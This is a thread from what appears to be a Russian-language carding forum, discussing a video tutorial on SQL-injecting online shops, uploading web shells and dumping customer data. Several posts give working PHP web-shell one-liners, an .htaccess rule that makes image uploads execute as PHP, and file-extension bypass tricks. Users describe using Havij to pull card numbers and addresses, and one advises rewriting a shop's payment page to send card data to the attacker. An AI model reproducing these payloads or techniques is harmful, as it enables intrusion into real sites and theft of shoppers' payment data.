[Видео] Шоп Sql-inject Шелл Дамп

Сегодня целый день мучал тот шоп)
И как итог:
Времени потратил дохрена -
Знаний набрался дохрена +
Не достал из шопа нихрена +
И походу дела там не инклуд никакой, а совсем другой оператор)))
В общем доволен.
Статья помогла - просто отлично! Научился заливать шеллы.
Всем спасибо!
 
Guha5277 said:
Сегодня целый день мучал тот шоп)
Click to expand...
Жизнь полна страданий:)
Guha5277 said:
И как итог:
Времени потратил дохрена -
Click to expand...
Тяжело в учение - легко в бою!
Guha5277 said:
Знаний набрался дохрена +
Click to expand...
Учение - свет, не учение - тьма.
Guha5277 said:
Не достал из шопа нихрена +
Click to expand...
Семь раз отмерь, один - отрежь.
Guha5277 said:
В общем доволен.
Статья помогла - просто отлично! Научился заливать шеллы.
Всем спасибо!
Click to expand...
Это самое главное. Не за что:)
 
Please note, if you want to make a deal with this user, that it is blocked.
Я один скачать не могоу? "3 Залив шела".
Сайт выдает постоянно вот это;
Sorry, the free service is at full capacity.

Please try later or upgrade to sendspace Max™ to enable guaranteed slots and instant, fast downloads.
sergaj, Перезалей если это так, пожлста
 
Last edited:
такая же фигня, ни под соксом ни под ВПНом не качает т.Т
 
Тоже такая беда перезалейте
 
господа-товарищи, у меня проблемы с инетом. из-за кривых рук китайцев и фильтра, некоторые скрипты не работают. поэтому напомните в середине следующей недели мне пожалуйста, тогда перезалью на нормальный файлообменик, который так быстро файлы не удаляет.
 
Please note, if you want to make a deal with this user, that it is blocked.
Блин =( А я так ждал вашего появления =). Хорошо обязательно напомним. Будем ждать.
 
перезалил. проверяйте.
 
что-то у меня аваст ругается и блокирует архив с видео там где шелл заливают.... пишет типа трояном пропатчен архив.....
 
Подскажите в чем проблема
Открываю в блокноте картинку добавляю в конец <?php system($_GET["cmd"]); ?>
заливаю на саит картинку
но когда пишу site.com/image.jpg?cmd=phpinfo();
нифига нет картинку показывает и все
Что делаю не так ?
Еще вопрос
Сменил расширение у шела на .jpg
залил как им воспользоваться? когда обращаюсь по адресу site.com/shell.jpg ничего непоказывает
Сори нубяра полный пытаюсь разобраться гуглю по теме ну пока ответы ненашол
 
Last edited:
shell.php.jpg
shell.jpg.php
shell.php%00.jpg
и другие вариации...
вбей в гугле - залив шелла через картинку
способов кучи - что-нить найдешь.
 
Please note, if you want to make a deal with this user, that it is blocked.
Подскажите плиз. Все шопы раскручиваю с помащью хавидж. Много шопов попадается с номером карты, именем, адресом, а вот свв нет. Где искать свв? И еще вопрос, может кто нить поделится колонками и таблицами для более эфиктивной раскрутки? Заранее спс за ответ!
 
Дмитрий911 said:
Подскажите плиз. Все шопы раскручиваю с помащью хавидж. Много шопов попадается с номером карты, именем, адресом, а вот свв нет.
Click to expand...
затерты скорее всего. поэтому нужно ставить сниффер.
можешь в личку стукнуть.

Дмитрий911 said:
Где искать свв? И еще вопрос, может кто нить поделится колонками и таблицами для более эфиктивной раскрутки? Заранее спс за ответ!
Click to expand...
сам составляешь такую базу. в самописных двигагах - там могут быть вообще не поддающиеся логике имена тайблов.

еще есть панголин для инъекций и многие другие.
 
which is best dork query , ? inurl: ************************** ?
 
Please note, if you want to make a deal with this user, that it is blocked.
sergaj, Спасибо за ответ. Прогуглил панголин, не могу найти нормального, можешь скинуть в пм сыль, или, что нибудь подобное. Если не сложно =)
 
я им не пользуюсь.
Хавидж и руки+голова в основном мои инструменты
 
RUN said:
Можно этот вопрос подробней освятить??? Думаю интересно будет не только мне.
Click to expand...

Переделай страницу оплаты чтобы тебе отправлялось все что нужно
 
platon123 said:
Подскажите в чем проблема
Открываю в блокноте картинку добавляю в конец <?php system($_GET["cmd"]); ?>
заливаю на саит картинку
но когда пишу site.com/image.jpg?cmd=phpinfo();
нифига нет картинку показывает и все
Что делаю не так ?
Еще вопрос
Сменил расширение у шела на .jpg
залил как им воспользоваться? когда обращаюсь по адресу site.com/shell.jpg ничего непоказывает
Сори нубяра полный пытаюсь разобраться гуглю по теме ну пока ответы ненашол
Click to expand...
Естесвенно ничего не будет. Ведь по умолчанию .jpg файл как php скрипт не будет интерпретироваться Веб сервером (Apache, nginx).
Следовательно надо сделать что-бы он это интерпретировал. Самый легкий метод, если есть возможность залития файлов, это залитие файла .htaccess с содержанием:
addtype application/x-httpd-php .php .jpg .jpeg .png
Click to expand...
Сначала льешь его, потом уже свою картинку (Шелл), и переходишь на него.
И кстате, лучше через WINHEX записывать в середину код:
<?PHP eval($_GET['c']); ?>
Ибо зачастую самописные "чекеры" формата файла, смотрят по заголовку (Черная стрелка) (Объявление файла зависит от его формата)
e41295328dae.jpg


Красным уже код.

На моем опыте часто такое вканывало, если не срабатывали другие методы.

Извините что апаю старый топик, но больно часто спрашивают.
И совет sergaj (Не в обиду, бредовый, хоть раз пробывал такое делать? Лишь второй вариант имеет свойство срабатывать иногда, остальное бред ИМХО )
shell.php.jpg
shell.jpg.php
shell.php%00.jpg
и другие вариации...
вбей в гугле - залив шелла через картинку
способов кучи - что-нить найдешь.
Click to expand...

Спасибо за внимание.
 
You must log in or register to reply here.

Similar threads

Friend
Обзор хакерства в кардинге
Replies
0
Views
264
Friend
Friend
chushpan
Что такое дамп кредитной карты и что он содержит
Replies
0
Views
58
chushpan
chushpan
S
SQLi | БАЗЫ | PENTESTING | СОФТ
Replies
0
Views
208
Student
S
chushpan
Скрипт подбора секретного ключа Ethereum
Replies
0
Views
153
chushpan
chushpan
chushpan
Из чего состоит дамп карты?
Replies
0
Views
114
chushpan
chushpan
Back
Top